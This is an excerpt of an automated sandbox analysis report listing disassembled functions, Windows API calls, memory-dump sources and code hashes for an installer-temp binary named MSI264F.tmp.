                                                                                                                        control_flow_graph 1560 b15a70-b15a8e call b00040 call b15120 1564 b15a93-b15aa2 1560->1564 1565 b15aa4-b15aa7 1564->1565 1566 b15aa9-b15ab0 1564->1566 1565->1566 1567 b15ab2-b15ab6 1566->1567 1568 b15ab8-b15abf 1566->1568 1567->1568 1569 b15ac1-b15ac5 1568->1569 1570 b15ac7-b15ada WaitForMultipleObjects 1568->1570 1569->1570 1571 b15b4a-b15b4c 1570->1571 1572 b15adc 1570->1572 1573 b15b95-b15ba3 1571->1573 1574 b15b4e-b15b51 1571->1574 1575 b15ae0-b15af4 WaitForSingleObject 1572->1575 1576 b15b53-b15b7f Sleep GetCurrentProcess TerminateProcess 1574->1576 1577 b15b82-b15b85 1574->1577 1578 b15b02-b15b1e ResetEvent call b155b0 1575->1578 1579 b15af6-b15b00 call b159d0 1575->1579 1577->1573 1580 b15b87-b15b92 call b155b0 1577->1580 1587 b15b20-b15b26 call b159d0 1578->1587 1588 b15b29-b15b43 SetEvent WaitForMultipleObjects 1578->1588 1579->1578 1580->1573 1587->1588 1588->1575 1590 b15b45 1588->1590 1590->1571
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B15120: GetCurrentProcess.KERNEL32 ref: 00B1513C
                                                                                                                          • Part of subcall function 00B15120: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI264F.tmp,00000104), ref: 00B1515A
                                                                                                                          • Part of subcall function 00B15120: WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSI264F.tmp,000000FF,?,00000104,00B699F4,00000000), ref: 00B151E4
                                                                                                                          • Part of subcall function 00B15120: _strrchr.LIBCMT ref: 00B151F3
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 00B15AD6
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B15AEC
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00B15B08
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B15B30
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 00B15B3F
                                                                                                                        • Sleep.KERNEL32(0000AFC8), ref: 00B15B59
                                                                                                                        • GetCurrentProcess.KERNEL32(000000FE), ref: 00B15B64
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B15B6B
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessWait$CurrentEventMultipleObjects$ByteCharCountFileModuleMultiNameObjectResetSingleSleepTerminateTickWide_strrchr
                                                                                                                        • String ID: MiniDump
                                                                                                                        • API String ID: 3629884183-2840755058
                                                                                                                        • Opcode ID: b7bffbd7f42c07b6cd203a780859556b0991aedb3509928b292ebe516acd1ea2
                                                                                                                        • Instruction ID: 68b0baad98ee7f30c1fb66c5892b7d7a95ef2ac5ac0b789e52facc2abe875f6f
                                                                                                                        • Opcode Fuzzy Hash: b7bffbd7f42c07b6cd203a780859556b0991aedb3509928b292ebe516acd1ea2
                                                                                                                        • Instruction Fuzzy Hash: 3C31DBB2640601EBD730DFA4AC45F9B77E8EB84720F940665F628D72E0EF749840C7A5
                                                                                                                        Function 00B25690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 00B256E4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B256EB
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 00B256FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleLongModuleNamePathProc
                                                                                                                        • String ID: GetLongPathNameW$kernel32
                                                                                                                        • API String ID: 1057403391-1414249016
                                                                                                                        • Opcode ID: 9b9157576617efde811f493e714c773ff9a766f2402ac0209bc6a8ad09b3488f
                                                                                                                        • Instruction ID: f1919faefdfa7739b99e2d04c6093e9c05f9a9094c0910f0136b6a00a8ae9c94
                                                                                                                        • Opcode Fuzzy Hash: 9b9157576617efde811f493e714c773ff9a766f2402ac0209bc6a8ad09b3488f
                                                                                                                        • Instruction Fuzzy Hash: 5351C231A106298BCB349B689D626FB72E5EF84314F5485E8ED0ADB291FA745E40C790
                                                                                                                        Function 00B15120 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B1513C
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI264F.tmp,00000104), ref: 00B1515A
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSI264F.tmp,000000FF,?,00000104,00B699F4,00000000), ref: 00B151E4
                                                                                                                        • _strrchr.LIBCMT ref: 00B151F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCurrentFileModuleMultiNameProcessWide_strrchr
                                                                                                                        • String ID: C:\Windows\Installer\MSI264F.tmp
                                                                                                                        • API String ID: 1198245186-1460191616
                                                                                                                        • Opcode ID: fba28a313ce850eb8b301e75a1e2c20eb342c7ab0a9feb2e03d67e2b6c76a612
                                                                                                                        • Instruction ID: 4d33d63c49d6c6fc68dae9da8d9ede7f77d17ae61b8ad0baab21e66407e0a50a
                                                                                                                        • Opcode Fuzzy Hash: fba28a313ce850eb8b301e75a1e2c20eb342c7ab0a9feb2e03d67e2b6c76a612
                                                                                                                        • Instruction Fuzzy Hash: E231AD74B00605EBEB60DF74DD41FAA37E8EB54304F94009CE849A72E1EFB09880CB90
                                                                                                                        Function 00B15BB0 Relevance: 7.5, APIs: 5, Instructions: 44synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(00000200), ref: 00B15BC4
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 00B15BE0
                                                                                                                        • CloseHandle.KERNELBASE(00000200), ref: 00B15BFC
                                                                                                                        • CloseHandle.KERNEL32(00000208), ref: 00B15C10
                                                                                                                        • CloseHandle.KERNEL32 ref: 00B15C19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$EventObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2857295742-0
                                                                                                                        • Opcode ID: dce94bfb5ba2a7c3e81c21ee8af9412e8498e17bd7cca20c5839559afecafb60
                                                                                                                        • Instruction ID: 285d0858e7f072c217228a6823b98605cc75756246fe1e5b2bc6b579687f8983
                                                                                                                        • Opcode Fuzzy Hash: dce94bfb5ba2a7c3e81c21ee8af9412e8498e17bd7cca20c5839559afecafb60
                                                                                                                        • Instruction Fuzzy Hash: B9F03175504B12DBDB208F68EC84B96B3ECDB84750F950065E504E32A0DF74DCC1CBA0
                                                                                                                        Function 00B26179 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 00B26230
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: C:\Windows\Installer\$NSW.LIC$longpath=%s
                                                                                                                        • API String ID: 1611563598-2863773485
                                                                                                                        • Opcode ID: db6d8d428cb977f5b09e231dbdb0b6d576d60017bf4e3b441f28552a6268277c
                                                                                                                        • Instruction ID: 68f8c81044bf9100fcc313ba953aaef19badabd31a89cb771e68139efeb10700
                                                                                                                        • Opcode Fuzzy Hash: db6d8d428cb977f5b09e231dbdb0b6d576d60017bf4e3b441f28552a6268277c
                                                                                                                        • Instruction Fuzzy Hash: 9031FE71A84321DECB24AB68AD27B7633E0EF40351F1504E5E80A9B7B2FB789941D761
                                                                                                                        Function 00B2E492 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: Command Line: %s$\
                                                                                                                        • API String ID: 2691759472-447013149
                                                                                                                        • Opcode ID: 292a6e28e422c13b6fb948a1645751269ea3aae984ff8d6e86f73c2424c54708
                                                                                                                        • Instruction ID: e8d26d5d71dcc2da342747d01d1bdd2b95ef29833958182fd4551088244e2f96
                                                                                                                        • Opcode Fuzzy Hash: 292a6e28e422c13b6fb948a1645751269ea3aae984ff8d6e86f73c2424c54708
                                                                                                                        • Instruction Fuzzy Hash: 8C317B7140022287CF306B18EC413A673F1EF94704F5886E5EA6E2B3A1F770AA46C786
                                                                                                                        Function 00B67F20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B67F7E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B67F93
                                                                                                                        • LoadLibraryW.KERNELBASE(psapi.dll,?,00B7F7C0,?), ref: 00B67FA5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: psapi.dll
                                                                                                                        • API String ID: 1493853955-80456845
                                                                                                                        • Opcode ID: 5e79f0a89a02b4f4031d81c4ca2d82bf289006a15eb2c2527bdcdc837d20f52e
                                                                                                                        • Instruction ID: 540617b4b723d07c1ffa83e26796481510e3910c7565333453b8ec213f7679df
                                                                                                                        • Opcode Fuzzy Hash: 5e79f0a89a02b4f4031d81c4ca2d82bf289006a15eb2c2527bdcdc837d20f52e
                                                                                                                        • Instruction Fuzzy Hash: 7211E3F1D12306AFC744DFA8ED41A5A7BE4BB08300F1442AAE819D73B2EF709544CBA5
                                                                                                                        Function 00B3D09C Relevance: 4.5, APIs: 3, Instructions: 21fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,00B34C9F,?,?,?,?,?), ref: 00B3D0A4
                                                                                                                        • GetLastError.KERNEL32(?,00B34C9F,?,?,?,?,?), ref: 00B3D0AE
                                                                                                                        • __dosmaperr.LIBCMT ref: 00B3D0BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1545401867-0
                                                                                                                        • Opcode ID: 93a0d9b495bf76b6e1937677c016dc2769e0243283ca45b88903b9690721a052
                                                                                                                        • Instruction ID: b3d947d06577dd6a2721e3c6876c2839b4b7fe7da4b9165721f71421ba06c5d1
                                                                                                                        • Opcode Fuzzy Hash: 93a0d9b495bf76b6e1937677c016dc2769e0243283ca45b88903b9690721a052
                                                                                                                        • Instruction Fuzzy Hash: C0D05E311485056B8F181AB5BC188163ADD9B40B71F7046A1F42CC61E0EF35C8059551
                                                                                                                        Function 00B3C94C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00B3C954
                                                                                                                          • Part of subcall function 00B3C921: GetModuleHandleW.KERNEL32(mscoree.dll,?,00B3C959,?,?,00B4925A,000000FF,0000001E,00B836B0,0000000C,00B49305,?,?,?,00B42AA8,0000000D), ref: 00B3C92B
                                                                                                                          • Part of subcall function 00B3C921: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B3C93B
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B3C95D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427264223-0
                                                                                                                        • Opcode ID: aaacfdbd33b1efad5a0812152e61f570ff86441c0f832008854e1d0029d7bd65
                                                                                                                        • Instruction ID: 7682604c175cf255ff582d44997cf9ff2ad0ba25d415287a7e883a46c013caeb
                                                                                                                        • Opcode Fuzzy Hash: aaacfdbd33b1efad5a0812152e61f570ff86441c0f832008854e1d0029d7bd65
                                                                                                                        • Instruction Fuzzy Hash: 00B09B3100410C7BCB012F51DC098493F59EB40760B514010F40405171DF72DD929684
                                                                                                                        Function 00B3C0C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __waccess_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4272103461-0
                                                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction ID: 03bad38e1e7188183fbfca2d67db6e2e7d4f8902a2228c5d6f25ab2e094ede50
                                                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction Fuzzy Hash: C5C09B3305414D7F5F196DE5EC05C553F59D6C0770B204155F91C89491DD32D5515640
                                                                                                                        Function 00B3CC21 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                          • Part of subcall function 00B3CAE1: __lock.LIBCMT ref: 00B3CAEF
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(00B82FA8,00000020,00B3CC48,?,00000001,00000000,?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D), ref: 00B3CB2B
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB3C
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(-00000004,?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB62
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB75
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer$__lock_doexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3343572566-0
                                                                                                                        • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                        • Instruction ID: 280afcc5c10ba3d85a08b98c0ba9d7e802b238d0ed40642599d5d3c34f8bc453
                                                                                                                        • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                        • Instruction Fuzzy Hash: F8B0927258020C33DA202596AC03F067E4987C0B60E640060BA0C291A2AAA3A96181D9
                                                                                                                        Function 00B39583 Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wfsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 197181222-0
                                                                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                        • Instruction ID: 0f08709ada09159de0c0611695fab746f69baedc58aa4186be2f18921080584d
                                                                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                        • Instruction Fuzzy Hash: A5C09B7244410C77CF111D82DC02E593F599BC0760F144050FB1C191619573D5619585

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00B00130 Relevance: 126.8, APIs: 49, Strings: 23, Instructions: 769windowthreadtimeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,?,00B00BEF,?,00B09820,?,00000000,?,00B00C46,?,00B09820,?,00000000), ref: 00B0015C
                                                                                                                        • _strrchr.LIBCMT ref: 00B0016F
                                                                                                                        • _strrchr.LIBCMT ref: 00B001A5
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B001D9
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B00204
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B00228
                                                                                                                        • TranslateMessage.USER32(?), ref: 00B00231
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B0023A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B00267
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0026A
                                                                                                                        • wsprintfW.USER32 ref: 00B0027F
                                                                                                                        • wsprintfW.USER32 ref: 00B002AE
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002CF
                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002D6
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002EB
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00312
                                                                                                                        • wsprintfW.USER32 ref: 00B00395
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00430
